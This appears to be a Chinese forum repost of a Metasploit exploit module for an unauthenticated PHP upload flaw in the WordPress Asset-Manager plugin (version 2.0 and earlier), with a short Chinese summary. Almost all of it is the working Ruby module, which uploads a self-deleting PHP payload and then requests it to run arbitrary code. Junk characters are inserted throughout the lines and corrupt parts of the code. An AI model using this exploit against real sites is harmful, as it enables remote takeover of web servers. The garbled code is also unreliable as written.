这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 R# d. E& H @& }0 s$ o# D
- C' W* G# k6 v+ @! a
##7 K J' B$ X. R$ O
# This file is part of the Metasploit Framework and may be subject to L" |9 [; ] `7 S0 b: G4 U \; _7 v4 q
# redistribution and commercial restrictions. Please see the Metasploit. Q p6 a/ Y- L' E# S
# Framework web site for more information on licensing and terms of use.
+ m% f; i# ?( |/ M, `7 ^9 v# http://metasploit.com/framework/
: r7 ~9 t& R2 [2 s( ]& x##
" g, G5 F/ r2 Y9 P9 I* i 3 s' S( O, q/ F4 B; P
require 'msf/core'
4 I @3 y, ], r9 s: C2 j' Trequire 'msf/core/exploit/php_exe'
( X7 I* ~0 H" F9 ?, c* ?' K! c7 Q 0 b+ E( v! k% \$ a
class Metasploit3 < Msf::Exploit::Remote" C2 N( g! p& {3 g
Rank = ExcellentRanking
0 i. ]' k" m, z" s. d% ?- O
; `1 j4 Y+ d3 Y: g# f include Msf::Exploit::Remote::HttpClient
% j8 m* b# G. Z. d5 {6 y include Msf::Exploit:hpEXE
3 L7 }- g/ ~; Z. C+ J + E- n1 p+ a; G7 Z l, N
def initialize(info = {})- a" P ~% Q c0 m
super(update_info(info,$ x' y2 d) Z5 ]: V f- W, x7 R; e$ ^
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',* a/ M# N, q6 V2 ?5 [$ H* _
'Description' => %q{: Y& z; N) c2 e! C! z" X6 ~! a
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress9 h0 Z. ?4 B9 j6 `9 @- @+ k
plugin. By abusing the upload.php file, a malicious user can upload a file to a. m" p: a. f7 Y) U* r+ x
temp directory without authentication, which results in arbitrary code execution.
4 G3 z8 v9 \; E o7 H* `! r( i }, h- D' I2 @4 a" z o" j
'Author' =>
- W7 C/ h# y, l [. N( z1 I; o: V: l
'Sammy FORGIT', # initial discovery3 V0 P, P) k/ a- k7 A
'James Fitts <fitts.james[at]gmail.com>' # metasploit module G4 w7 J4 I& H% q
],6 A, A, U% @- ^5 B! \
'License' => MSF_LICENSE,
4 q: b9 j6 _' u3 i; X+ q$ q& T5 M 'References' =>
, w( M1 ~2 _5 @ D5 f0 f [* v& F0 b) _8 ]* v- e
[ 'OSVDB', '82653' ],
7 y" m7 S5 D. f3 ^4 O( I s: F [ 'BID', '53809' ],
7 i& V/ x0 W0 Z [ 'EDB', '18993' ],
& ?- i+ u+ W% V& [) M. y3 B6 b [ 'URL', 'http:// www.myhack58.com /' ]6 o- p6 e6 j; j3 s& i G
],/ l( l( M5 d, F# ]! P
'Payload' =>
5 }) O! b+ I# t2 o8 L' ^ {
+ c) B1 O5 g% F! N+ w" c8 D 'BadChars' => "\x00",3 N2 B: Z! k9 f6 ?% Z
},) s1 t) t: L7 D; A9 H4 O( C3 w
'Platform' => 'php',/ `( d8 ]; W P# o$ J
'Arch' => ARCH_PHP,
7 x: ]( V% r$ j% v* O. E 'Targets' =>
! v0 S+ _5 h, p, ~7 k [6 P8 l! z! N: r! m- M2 r- v
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], H- U7 H6 s( {" K& O( A* m
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
- C' b: G3 |8 @$ H' {4 I ],
, t) x0 d1 X+ t4 O 'DefaultTarget' => 0,
/ p+ d# \! p1 \7 O2 Z; N; }7 _: d 'DisclosureDate' => 'May 26 2012')): A5 j' {1 d& w r
5 w) w( r* e# G8 f0 {7 e register_options(
4 x4 F' L% c! l8 L9 v [
6 T' T, M* `% _: U' J OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])% ^' o+ C. |' L, z: q
], self.class)
6 s0 \& g0 M* N end( F$ ]' c m7 ?/ u
/ A( k: {; b, i! u9 b5 P1 x- ~# L7 N
def exploit
0 @/ r. _" i% a uri = target_uri.path( p7 ?$ }" h1 d, ]1 }1 e+ z! N
uri << '/' if uri[-1,1] != '/'
3 j+ A% k( m, R peer = "#{rhost}:#{rport}"
; I2 s: n6 I4 W payload_name = "#{rand_text_alpha(5)}.php"
4 l9 _( } R% ?2 x3 E php_payload = get_write_exec_payload(:unlink_self=>true)
, Q" T- g# G! U6 o4 R
8 v: s( A, ? U5 m data = Rex::MIME::Message.new5 Y- k& R& }# Y+ W4 n
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
5 q. ~' c' B; o* C2 H8 m post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
& A5 K, G1 m* G# i' a: E* o
8 K7 ]- n: S! y- w print_status("#{peer} - Uploading payload #{payload_name}")
+ W8 ~0 p3 q$ ]3 r) X res = send_request_cgi({. n8 Q6 M3 `" t a R) C& A3 X9 J
'method' => 'POST',- a( l. i2 T$ _( Z" Y! a
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",; v9 s3 t/ z7 x: G! r2 C
'ctype' => "multipart/form-data; boundary=#{data.bound}",* [4 W$ u' K4 S+ x; \
'data' => post_data( q, l% ^* x1 l9 ]* s
})
, y/ s' M% z7 h3 M* f: O) @9 e
/ L7 F, }6 k; }* N! L if not res or res.code != 200 or res.body !~ /#{payload_name}/
[& u$ B+ E: M8 N fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
8 l; v* t0 N' p0 k* Fend
6 R$ v7 P: `) G3 v$ f/ G8 o - v+ O% b" w' t0 s% r% s4 t: f
print_status("#{peer} - Executing payload #{payload_name}")! U$ r: U! Y/ J
res = send_request_raw({* x+ a8 n# F8 E. D
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
) h5 T, u- }6 y- G 'method' => 'GET'
) f) v: m' ^$ E& k% u })" _' I6 X( `; L( j, j3 z) b
/ e6 ^, Q3 L/ f# r' ?
if res and res.code != 200/ n2 j: T8 V, [; L: u) ?
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")7 ~2 J7 H* m- ~3 w# x
end
/ [9 V# _- H7 ? end+ P' ?" c; a* s5 |. J6 C
end
" |* C" c: W: D |